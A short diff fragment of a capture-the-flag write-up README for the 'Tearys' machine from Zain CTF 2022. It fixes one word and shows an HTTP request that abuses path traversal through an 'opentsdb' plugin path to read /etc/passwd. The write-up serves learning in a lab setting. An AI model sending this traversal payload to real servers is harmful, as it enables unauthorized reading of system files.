BaadMaro/CTF/Zain CTF 2022/Machines/Tearys/README.md

 ```
 The exploit was able to found a plugin **opentsdb** but failed to perform LFI

-Let's decode the payload i'll use Burp
+Let's encode the payload i'll use Burp

 ```http
 GET /public/plugins/opentsdb/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd HTTP/1.1